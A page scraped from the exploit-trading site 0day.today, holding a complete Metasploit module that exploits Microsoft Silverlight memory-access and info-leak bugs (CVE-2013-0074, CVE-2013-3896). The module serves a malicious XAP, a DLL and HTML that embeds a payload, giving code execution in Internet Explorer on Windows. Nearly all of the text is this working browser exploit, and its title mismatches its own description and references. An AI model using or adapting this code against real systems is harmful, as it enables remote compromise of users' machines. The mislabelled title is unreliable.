0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer MANIFEST = <<-EOS <Deployment xmlns="http://schemas.microsoft.com/client/2007/deployment" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" EntryPointAssembly="SilverApp1" EntryPointType="SilverApp1.App" RuntimeVersion="4.0.50826.0"> <Deployment.Parts> <AssemblyPart x:Name="SilverApp1" Source="SilverApp1.dll" /> </Deployment.Parts> </Deployment> EOS def initialize(info={}) super(update_info(info, 'Name' => "MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access", 'Description' => %q{ This module exploits a vulnerability on Microsoft Silverlight. The vulnerability exists on the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible to dereference arbitrary memory which easily leverages to arbitrary code execution. In order to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class from System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP SP3 / Windows 7 SP1 on both x32 and x64 architectures. }, 'License' => MSF_LICENSE, 'Author' => [ 'James Forshaw', # RCE Vulnerability discovery 'Vitaliy Toropov', # Info Leak discovery, original exploit, all the hard work 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2013-0074' ], [ 'CVE', '2013-3896' ], [ 'OSVDB', '91147' ], [ 'OSVDB', '98223' ], [ 'BID', '58327' ], [ 'BID', '62793' ], [ 'MSB', 'MS13-022' ], [ 'MSB', 'MS13-087' ], [ 'URL', 'http://packetstormsecurity.com/files/123731/' ] ], 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f', 'EXITFUNC' => 'thread' }, 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X86_64], 'BrowserRequirements' => { :source => /script|headers/i, :os_name => Msf::OperatingSystems::WINDOWS, :ua_name => Msf::HttpClients::IE }, 'Targets' => [ [ 'Windows x86', { 'arch' => ARCH_X86 } ], [ 'Windows x64', { 'arch' => ARCH_X86_64 } ] ], 'Privileged' => false, 'DisclosureDate' => "Mar 12 2013", 'DefaultTarget' => 0)) end def setup @xap_name = "#{rand_text_alpha(5 + rand(5))}.xap" @dll_name = "#{rand_text_alpha(5 + rand(5))}.dll" File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2013-0074", "SilverApp1.xap" ), "rb") { |f| @xap = f.read } File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2013-0074", "SilverApp1.dll" ), "rb") { |f| @dll = f.read } @xaml = MANIFEST.gsub(/SilverApp1\.dll/, @dll_name) super end def exploit_template(cli, target_info) my_payload = get_payload(cli, target_info) # Align to 4 bytes the x86 payload if target_info[:arch] == ARCH_X86 while my_payload.length % 4 != 0 my_payload = "\x90" + my_payload end end my_payload = Rex::Text.encode_base64(my_payload) html_template = <<-EOF <html> <!-- saved from url=(0014)about:internet --> <head> <title>Silverlight Application</title> <style type="text/css"> html, body { height: 100%; overflow: auto; } body { padding: 0; margin: 0; } #form1 { height: 99%; } #silverlightControlHost { text-align:center; } </style> </head> <body> <form id="form1" runat="server" > <div id="silverlightControlHost"> <object data="data:application/x-silverlight-2," type="application/x-silverlight-2" width="100%" height="100%"> <param name="source" value="<%= @xap_name %>"/> <param name="background" value="white" /> <param name="InitParams" value="payload=<%= my_payload %>" /> </object> </div> </form> </body> </html> EOF return html_template, binding() end def on_request_exploit(cli, request, target_info) print_status("request: #{request.uri}") if request.uri =~ /#{@xap_name}$/ print_status("Sending XAP...") send_response(cli, @xap, { 'Content-Type' => 'application/x-silverlight-2', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' }) elsif request.uri =~ /#{@dll_name}$/ print_status("Sending DLL...") send_response(cli, @dll, { 'Content-Type' => 'application/octect-stream', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' }) elsif request.uri =~ /AppManifest.xaml$/ print_status("Sending XAML...") send_response(cli, @xaml, { 'Content-Type' => 'text/xaml', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' }) else print_status("Sending HTML...") send_exploit_html(cli, exploit_template(cli, target_info)) end end end # 0day.today [2024-12-24] #